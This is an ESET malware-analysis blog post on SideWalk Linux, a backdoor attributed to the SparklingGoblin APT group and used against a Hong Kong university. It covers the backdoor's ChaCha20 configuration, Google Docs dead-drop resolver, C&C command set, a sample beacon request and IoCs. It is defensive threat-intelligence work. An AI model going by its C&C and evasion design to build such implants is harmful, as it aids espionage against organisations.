ESET researchers have discovered a Linux variant of the SideWalk backdoor, one of the multiple custom implants used by the SparklingGoblin APT group. This variant was deployed against a Hong Kong university in February 2021, the same university that had already been targeted by SparklingGoblin during the student protests in May 2020. We originally named this backdoor StageClient, but now refer to it simply as SideWalk Linux. We also discovered that a previously known Linux backdoor – the Specter RAT, first documented by 360 Netlab – is also actually a SideWalk Linux variant, having multiple commonalities with the samples we identified.

SparklingGoblin is an APT group whose tactics, techniques, and procedures (TTPs) partially overlap with APT41 and BARIUM. It makes use of Motnug and ChaCha20-based loaders, the CROSSWALK and SideWalk backdoors, along with Korplug (aka PlugX) and Cobalt Strike. While the group targets mostly East and Southeast Asia, we have also seen SparklingGoblin targeting a broad range of organizations and verticals around the world, with a particular focus on the academic sector. SparklingGoblin is one of the groups with access to the ShadowPad backdoor.

This blogpost documents SideWalk Linux, its victimology, and its numerous similarities with the originally discovered SideWalk backdoor.

Attribution

The SideWalk backdoor is exclusive to SparklingGoblin. In addition to the multiple code similarities between the Linux variants of SideWalk and various SparklingGoblin tools, one of the SideWalk Linux samples uses a C&C address (66.42.103[.]222) that was previously used by SparklingGoblin.

Considering all of these factors, we attribute with high confidence SideWalk Linux to the SparklingGoblin APT group.

Victimology

Even though there are various SideWalk Linux samples, as we now know them, on VirusTotal, in our telemetry we have found only one victim compromised with this SideWalk variant: a Hong Kong university that, amidst student protests, had previously been targeted by both SparklingGoblin (using the Motnug loader and the CROSSWALK backdoor) and Fishmonger (using the ShadowPad and Spyder backdoors). Note that at that time we put those two different clusters of activity under the broader Winnti Group denomination.

SparklingGoblin first compromised this particular university in May 2020, and we first detected the Linux variant of SideWalk in that university’s network in February 2021. The group continuously targeted this organization over a long period of time, successfully compromising multiple key servers, including a print server, an email server, and a server used to manage student schedules and course registrations.

The road to Sidewalk Linux

SideWalk, which we first described in its Windows form in our blogpost on August 24th, 2021, is a multipurpose backdoor that can load additional modules sent from the C&C server. It makes use of Google Docs as a dead-drop resolver, and Cloudflare workers as its C&C server. It can properly handle communication behind a proxy.

The compromise chain is currently unknown, but we think that the initial attack vector could have been exploitation. This hypothesis is based on the 360 Netlab article describing the Specter botnet targeting IP cameras, and NVR and DVR devices, and the fact that the Hong Kong victim used a vulnerable WordPress server, since there were many attempts to install various webshells.

We first documented the Linux variant of SideWalk as StageClient on July 2nd, 2021, without making the connection at that time to SparklingGoblin and its custom SideWalk backdoor. The original name was used because of the repeated appearances of the string StageClient in the code.

While researching StageClient further, we found a blogpost about the Specter botnet described by 360 Netlab. That blogpost describes a modular Linux backdoor with flexible configuration that uses a ChaCha20 encryption variant – basically a subset of StageClient’s functionality. Further inspection confirmed this hypothesis; we additionally found a huge overlap in functionality, infrastructure, and symbols present in all the binaries.

We compared the StageClient sample E5E6E100876E652189E7D25FFCF06DE959093433 with Specter samples 7DF0BE2774B17F672B96860D013A933E97862E6C and found numerous similarities, some of which we list below.

First, there is an overlap in C&C commands. Next, the samples have the same structure of configuration and encryption method (see Figure 1 and Figure 2).

Figure 1. StageClient’s configuration with modified symbols

Figure 2. Specter’s configuration with modified symbols

Additionally, the samples’ modules are managed in almost the same way, and the majority of the interfaces are identical; modules of StageClient only need to implement one additional handler, which is for closing the module. Three out of the five known modules are almost identical.

Lastly, we could see striking overlaps in the network protocols of the compared samples. A variant of ChaCha20 is used twice for encryption with LZ4 compression in the very same way. Both StageClient and Specter create a number of threads (see Figure 3 and Figure 4) to manage sending and receiving asynchronous messages along with heartbeats.

Figure 3. A part of StageClient’s StageClient::StartNetwork function

Figure 4. A part of Specter’s StartNetwork function

Despite all these striking similarities, there are several changes. The most notable ones are the following:

  • The authors switched from the C language to C++. The reason is unknown, but it should be easier to implement such modular architecture in C++ due to its polymorphism support.
  • An option to exchange messages over HTTP was added (see Figure 5 and Figure 6).

Figure 5. Sending a message in StageClient

Figure 6. Sending a message in Specter

  • Downloadable plugins were replaced with precompiled modules that fulfill the same purpose; a number of new commands and two new modules were added.
  • Added the module TaskSchedulerMod, which operates as a built-in cron utility. Its cron table is stored in memory; the jobs are received over the network and executed as shell commands.
  • Added the module SysInfoMgr, which provides information about the underlying system such as the list of installed packages and hardware details.

These similarities convince us that Specter and StageClient are from the same malware family. However, considering the numerous code overlaps between the StageClient variant used against the Hong Kong university in February 2021 and SideWalk for Windows, as described in the next section, we now believe that Specter and StageClient are both Linux variants of SideWalk, so we have decided to refer to them as SideWalk Linux.

Similarities with the Windows variant

SideWalk Windows and SideWalk Linux share too many similarities to describe within the confines of this blogpost, so here we only cover the most striking ones.

ChaCha20

An obvious similarity is noticeable in the implementations of ChaCha20 encryption: both variants use a counter with an initial value of 0x0B, which was previously mentioned in our blogpost as a specificity of SideWalk’s ChaCha20 implementation.

Software architecture

One SideWalk particularity is the use of multiple threads to execute one specific task. We noticed that in both variants there are exactly five threads executed simultaneously, each of them having a specific task. The following list describes the function of each; the thread names are from the code:

  • StageClient::ThreadNetworkReverse
    If a connection to the C&C server is not already established, this thread periodically attempts to retrieve the local proxy configuration and the C&C server location from the dead-drop resolver. If the previous step was successful, it attempts to initiate a connection to the C&C server.
  • StageClient::ThreadHeartDetect
    If the backdoor did not receive a command in the specified amount of time, this thread can terminate the connection with the C&C server or switch to a “nap” mode that introduces minor changes to the behavior.
  • StageClient::ThreadPollingDriven
    If there is no other queued data to send, this thread periodically sends a heartbeat command to the C&C server that can additionally contain the current time.
  • StageClient::ThreadBizMsgSend
    This thread periodically checks whether there is data to be sent in the message queues used by all the other threads and, if so, processes it.
  • StageClient::ThreadBizMsgHandler
    This thread periodically checks whether there are any pending messages received from the C&C server and, if so, handles them.

Configuration

As in SideWalk Windows, the configuration is decrypted using ChaCha20.

Checksum

First, before decrypting, there is a data integrity check. This check is similar in both implementations of SideWalk (see Figure 7 and Figure 8): an MD5 hash is computed on the ChaCha20 nonce concatenated to the encrypted configuration data. This hash is then checked against a predefined value, and if not equal, SideWalk exits.

Figure 7. SideWalk Linux: Configuration integrity check

Figure 8. SideWalk Windows: Configuration integrity check

Layout

Figure 9 presents excerpts of decrypted configurations from the samples that we analyzed.

Figure 9. Configuration parts from E5E6E100876E652189E7D25FFCF06DE959093433 (left) and FA6A40D3FC5CD4D975A01E298179A0B36AA02D4E (right)

The SideWalk Linux config contains less information than the SideWalk Windows one. This makes sense because the majority of the configuration artifacts in SideWalk Windows are used as cryptography and network parameters, whereas most of these are internal in SideWalk Linux.

Decryption using ChaCha20

As previously mentioned, SideWalk uses a main global structure to store its configuration. This configuration is first decrypted using the modified implementation of ChaCha20, as seen in Figure 10.

Figure 10. ChaCha20 decryption call in SideWalk Windows (left) and in SideWalk Linux (right)

Note that the ChaCha20 key is exactly the same in both variants, strengthening the connection between the two.

Dead-drop resolver

The dead-drop resolver payload is identical in both samples. As a reminder from our blogpost on SideWalk, Figure 11 depicts the format of the payload that is fetched from the dead-drop resolver.

Figure 11. Format of the string hosted in the Google Docs document

For the first delimiter, we notice that the PublicKey: part of the string is ignored; the string AE68[…]3EFF is directly searched, as shown in Figure 12.

Figure 12. SideWalk Linux’s first delimiter routine (left), end delimiter and middle delimiter routines (right)

The delimiters are identical, as well as the whole decoding algorithm.

Victim fingerprinting

In order to fingerprint the victim, different artifacts are gathered on the victim’s machine. We noticed that the fetched information is exactly the same, to the extent of it even being fetched in the same order.

As the boot time in either case is a Windows-compliant time format, we can hypothesize that the operators’ controller runs under Windows, and that the controller is the same for both Linux and Windows victims. Another argument supporting this hypothesis is that the ChaCha20 keys used in both implementations of SideWalk are the same.

Communication protocol

Data serialization

The communication protocol between the infected machine and the C&C is HTTP or HTTPS, depending on the configuration, but in both cases, the data is serialized in the same manner. Not only is the implementation very similar, but the identical encryption key is used in both implementations, which, again, accentuates the similarity between the two variants.

POST requests

In the POST requests used by SideWalk to fetch commands and payloads from the C&C server, one noticeable point is the use of the two parameters gtsid and gtuvid, as seen in Figure 13. Identical parameters are used in the Linux variant.

POST /M26RcKtVr5WniDVZ/5CDpKo5zmAYbTmFl HTTP/1.1
Cache-Control: no-cache
Connection: close
Pragma: no-cache
User-Agent: Mozilla/5.0 Chrome/72.0.3626.109 Safari/537.36
gtsid: zn3isN2C6bWsqYvO
gtuvid: 7651E459979F931D39EDC12D68384C21249A8DE265F3A925F6E289A2467BC47D
Content-Length: 120
Host: update.facebookint.workers[.]dev

Figure 13. Example of a POST request used by SideWalk Windows

Another interesting point is that the Windows variant runs as fully position-independent shellcode, whereas the Linux variant is a shared library. However, we think the malware’s authors could have just taken an extra step, using a tool such as sRDI to convert a compiled SideWalk PE to shellcode instead of manually writing the shellcode.

Commands

Only four commands are not implemented or implemented differently in the Linux variant, as listed in Table 1. All the other commands are present – even with the same IDs.

Table 1. Commands with different or missing implementation in the Linux version of SideWalk

Command ID (from C&C) Windows variants Linux variants
0x7C Load a plugin sent by the C&C server. Not implemented in SideWalk Linux.
0x82 Collect domain information about running processes, and owners (owner SID, account name, process name, domain information). Do nothing.
0x8C Data serialization function. Commands that are not handled, but fall in the default case, which is broadcasting a message to all the loaded modules.
0x8E Write the received data to the file located at %AllUsersProfile%\UTXP\nat\<filename>, where <filename> is a hash of the value returned by VirtualAlloc at each execution of the malware. #rowspan#

Versioning

In the Linux variant, we observed a specificity that was not found in the Windows variant: a version number is computed (see Figure 14).

Figure 14. Versioning function in SideWalk Linux

The hardcoded date could be the beginning or end of development of this version of SideWalk Linux. The final computation is made out of the year, day, and month, from the value Oct 26 2020. In this case, the result is 1171798691840.

Plugins

In SideWalk Linux variants, modules are built in; they cannot be fetched from the C&C server. That is a notable difference from the Windows variant. Some of those built-in functionalities, like gathering system information (SysInfoMgr, for example) such as network configuration, are done directly by dedicated functions in the Windows variant. In the Windows variant, some plugins can be added through C&C communication.

Defense evasion

The Windows variant of SideWalk goes to great lengths to conceal the objectives of its code. It trimmed out all data and code that was unnecessary for its execution and encrypted the rest. On the other hand, the Linux variants contain symbols and leave some unique authentication keys and other artifacts unencrypted, which makes the detection and analysis significantly easier.

Additionally, the much higher number of inlined functions in the Windows variant suggests that its code was compiled with a higher level of compiler optimizations.

Conclusion

The backdoor that was used to attack a Hong Kong university in February 2021 is the same malware family as the SideWalk backdoor, and actually is a Linux variant of the backdoor. This Linux version exhibits several similarities with its Windows counterpart along with various novelties.

For any inquiries about our research published on WeLiveSecurity, please contact us at threatintel@eset.com.
ESET Research now also offers private APT intelligence reports and data feeds. For any inquiries about this service, visit the ESET Threat Intelligence page.

IoCs

A comprehensive list of Indicators of Compromise and samples can be found in our GitHub repository.

SHA-1 Filename ESET detection name Description
FA6A40D3FC5CD4D975A01E298179A0B36AA02D4E ssh_tunnel1_0 Linux/SideWalk.L SideWalk Linux (StageClient variant)
7DF0BE2774B17F672B96860D013A933E97862E6C hw_ex_watchdog.exe Linux/SideWalk.B SideWalk Linux (Specter variant)

Network

Domain IP First seen Notes
rec.micosoft[.]ga 172.67.8[.]59 2021-06-15 SideWalk C&C server (StageClient variant)
66.42.103[.]222 2020-09-25 SideWalk C&C server (Specter variant from 360 Netlab’s blogpost)

MITRE ATT&CK techniques

This table was built using version 11 of the MITRE ATT&CK framework.

Tactic ID Name Description
Resource Development T1587.001 Develop Capabilities: Malware SparklingGoblin uses its own malware arsenal.
Discovery T1016 System Network Configuration Discovery SideWalk Linux has the ability to find the network configuration of the compromised machine, including the proxy configuration.
Command and Control T1071.001 Application Layer Protocol: Web Protocols SideWalk Linux communicates via HTTPS with the C&C server.
T1573.001 Encrypted Channel: Symmetric Cryptography SideWalk Linux uses ChaCha20 to encrypt communication data.